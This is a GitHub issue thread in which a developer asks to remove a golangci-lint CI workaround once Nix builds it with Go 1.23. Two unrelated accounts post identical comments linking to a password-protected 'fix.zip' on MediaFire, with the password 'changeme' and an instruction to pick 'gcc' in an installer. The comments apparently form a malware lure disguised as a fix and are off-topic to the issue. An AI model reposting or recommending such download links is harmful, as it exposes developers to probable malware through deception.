### ISSUE TITLE
Remove CI workaround for Golangci-Lint

### ISSUE THREAD

**Issue by csatib02** [bank-vaults/vault-sdk#432]
### Preflight Checklist

- [X] I have searched the [issue tracker](https://www.github.com/bank-vaults/vault-sdk/issues) for an issue that matches the one I want to file, without success.
- [X] I am not looking for support or already pursued the available [support channels](https://bank-vaults.dev/docs/support) without success.
- [X] I agree to follow the [Code of Conduct](https://bank-vaults.dev/docs/code-of-conduct).

### Vault SDK Version

v0.9.4

### Expected Behavior

Context: https://github.com/bank-vaults/vault-sdk/pull/427

### Actual Behavior

Remove the workaround once Nix builds Golangci-lint with Go version 1.23

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
